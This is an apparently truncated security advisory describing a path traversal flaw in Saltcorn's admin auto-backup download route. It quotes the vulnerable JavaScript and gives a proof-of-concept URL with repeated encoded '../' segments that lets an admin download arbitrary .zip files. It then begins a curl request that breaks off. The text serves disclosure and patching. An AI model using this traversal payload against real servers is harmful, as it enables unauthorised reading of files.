Summary A user with admin permission can read and download arbitrary zip files when downloading auto backups. The file name used to identify the zip file is not properly sanitized when passed to res.download API. Details file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/admin.js#L671-L682 js router.get( "/auto-backup-download/:filename", isAdmin, error_catcher(async (req, res) => { const { filename } = req.params; // [1] source […] if ( !isRoot || !(filename.startsWith(backup_file_prefix) && filename.endsWith(".zip")) // [2] ) { res.redirect("/admin/backup"); return; } const auto_backup_directory = getState().getConfig("auto_backup_directory"); res.download(path.join(auto_backup_directory, filename), filename); // [3] sink }) ); Steps to reproduce (PoC) create a file with .zip extension under /tmp folder: echo "secret12345" > /tmp/secret.zip log into the application as an admin user visit the url https://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip download the zip file and then check if the zip was indeed downloaded: bash cat secret.zip secret12345 Alternatively send the following request to retrieve the file just created. bash curl -i -X $'GET' -H $'Host: localhost:3000' -H $'Connection: close' -b…Read More